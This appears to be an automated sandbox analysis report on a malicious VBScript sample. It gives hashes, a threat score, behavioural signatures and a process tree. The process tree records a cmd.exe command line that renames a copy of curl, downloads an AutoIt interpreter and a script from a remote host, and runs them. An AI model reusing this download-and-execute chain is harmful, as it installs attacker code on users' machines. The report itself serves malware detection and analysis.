Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
04/10/2023, 13:37
Static task
static1
Behavioral task
behavioral1
Sample
Test_395-32217.vbs
Resource
win7-20230831-en
4 signatures
150 seconds
General
-
Target
Test_395-32217.vbs
-
Size
2.3MB
-
MD5
c28396bac68b9bb0186a5c0604304099
-
SHA1
2073aef8d1b9b4971088644b4e09f7f417c615f9
-
SHA256
1295bda56de98063e23904ebb5deaf00e41f7f59c53aea1ec014aa4ec57df8df
-
SHA512
dc7a34b6a602d3aa1952492a9fbc78d23b644d8e483911cb0798e1d49177c1755718b17fc3470c596f708118075b6b3d3d58040e581d5c5eae0179a310631f6b
-
SSDEEP
49152:jvPuvYvG2sIS6hkJqLuKbhug8l01OnhyxH:P
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1960 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1960 wrote to memory of 1732 1960 WScript.exe 28 PID 1960 wrote to memory of 1732 1960 WScript.exe 28 PID 1960 wrote to memory of 1732 1960 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-32217.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o zfjriz.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe zfjriz.au32⤵PID:1732
-